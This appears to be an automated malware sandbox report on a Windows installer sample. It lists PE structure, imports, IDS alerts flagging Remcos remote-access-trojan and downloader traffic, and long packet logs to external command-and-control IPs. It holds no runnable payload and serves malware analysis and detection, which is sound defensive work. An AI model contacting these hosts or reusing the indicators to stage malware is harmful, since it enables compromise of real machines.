                                                                                                            jmp 00007FBF6CD50175h
                                                                                                            cmp cl, 00000020h
                                                                                                            jne 00007FBF6CD500B8h
                                                                                                            inc eax
                                                                                                            cmp byte ptr [eax], 00000020h
                                                                                                            je 00007FBF6CD500ACh
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x49000          0x33e8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x298         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5be4 | 0x5c00 | a9339c1bdb66abf46dde2cd3394ff34a | False | 0.6697944972826086 | data | 6.480161249709841 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x11ce | 0x1200 | 5801d712ecba58aa87d1e7d1aa24f3aa | False | 0.4522569444444444 | OpenPGP Secret Key | 5.236122428806677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a7d8 | 0x400 | fb9d2533be3ef4d00846e8af39bd7737 | False | 0.60546875 | data | 4.9399066801473905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x49000 | 0x33e8 | 0x3400 | a30a3ba6a156bc3079cd512b77dd1c4e | False | 0.4284855769230769 | data | 5.116822082391606 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x492f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5030487804878049
RT_ICON | 0x4a3a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.39305054151624547
RT_ICON | 0x4ac48 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4342485549132948
RT_ICON | 0x4b1b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.42730496453900707
RT_ICON | 0x4b618 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.3803763440860215
RT_ICON | 0x4b900 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.5743243243243243
RT_DIALOG | 0x4ba28 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4bb28 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4bc48 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4bd10 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4bd70 | 0x5a | data | English | United States | 0.7
RT_VERSION | 0x4bdd0 | 0x30c | data | English | United States | 0.4948717948717949
RT_MANIFEST | 0x4c0e0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T12:20:15.335061+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49826 | 45.133.158.36 | 80 | TCP
2024-11-21T12:20:18.397173+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49833 | 45.133.158.36 | 11371 | TCP
2024-11-21T12:20:20.709769+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49840 | 45.133.158.36 | 11371 | TCP
2024-11-21T12:20:20.949672+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49842 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Nov 21, 2024 12:20:15.885234118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.893506050 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.893595934 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.893651009 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.893702984 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.901912928 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.901931047 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.901983023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.902031898 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.910270929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.910331964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.910388947 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.910388947 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.918807983 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.918828964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.918920040 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.918920040 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.927222013 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.927299023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.927333117 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.927390099 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.935616970 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.935698032 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.935718060 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.935787916 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.944067001 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.944183111 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.944185972 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.944247007 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.952138901 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.952228069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.952234983 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.952316999 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.959712982 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.959856033 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.959867954 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.959899902 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.966846943 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.966932058 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.966975927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.966975927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.973819971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.973872900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.973901033 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.973922968 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.980300903 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.980336905 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.980401039 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.980401039 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.986542940 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.986618042 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.986635923 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.986673117 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.992640972 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.992679119 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.992741108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.992741108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.995665073 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.995764971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.995843887 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.998727083 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.998857021 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.998886108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.998980999 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.001805067 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.001857996 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.001909971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.001993895 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.004959106 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.005050898 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.005062103 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.005129099 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.007777929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.007846117 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.007890940 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.008012056 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.010622978 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.010711908 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.010745049 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.010831118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.013569117 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.013639927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.013716936 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.013900042 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.016383886 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.016489029 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.016493082 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.016539097 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.019290924 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.019354105 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.019356012 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.019407034 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.022104979 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.022218943 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.022228003 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.022267103 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.024988890 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.025124073 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.025191069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.025239944 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.027832985 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.027903080 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.027947903 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.028002024 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.030824900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.030889034 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.030915022 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.030951023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.033632994 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.033736944 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.033780098 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.033781052 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.036509991 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.036581993 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.036611080 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.036655903 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.039344072 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.039370060 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.039478064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.039478064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.042362928 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.042426109 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.042637110 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.042637110 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.045177937 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.045248985 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.045264959 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.045299053 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.047982931 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.048070908 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.048090935 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.048193932 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.050939083 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.051043034 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.051079035 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.051214933 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.053711891 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.053761005 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.053785086 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.053831100 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.056653023 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.056762934 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.056813002 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.056813002 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.059422016 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.059489012 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.059492111 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.059601068 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.062304974 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.062382936 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.062397003 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.062455893 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.065176964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.065295935 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.065360069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.065360069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.068069935 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.068165064 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.068222046 CET4982680192.168.2.745.133.158.36
Timestamp                             Source Port   Dest Port   Source IP         Dest IP
Nov 21, 2024 12:20:16.068222046 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.070945024 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.070981979 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.071024895 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.071024895 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.073790073 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.073864937 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.073869944 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.073931932 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.102821112 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.102885008 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.102960110 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.102960110 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.104306936 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.104430914 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.104556084 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.104556084 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.107148886 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.107275963 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.108179092 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.108264923 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.108432055 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.108485937 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.110986948 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.111093998 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.111100912 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.111186981 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.113823891 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.113908052 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.113962889 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.113962889 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.116652966 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.116770029 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.116771936 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.116823912 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.119446993 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.119573116 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.119606018 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.119671106 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.122117996 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.122204065 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.122319937 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.122397900 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.124772072 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.124881029 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.124881983 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.124990940 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.127394915 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.127423048 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.127623081 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.127623081 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.129833937 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.129913092 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.129936934 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.130055904 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.132313967 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.132381916 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.132390022 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.132608891 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.134624004 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.134736061 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.134778976 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.134872913 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.136924982 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.137003899 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.137125015 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.137125015 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.139010906 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.139090061 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.139332056 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.139332056 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.141170979 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.141277075 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.141298056 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.141352892 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.143228054 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.143280029 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.143337011 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.143419027 CET   49826         80          192.168.2.7       45.133.158.36
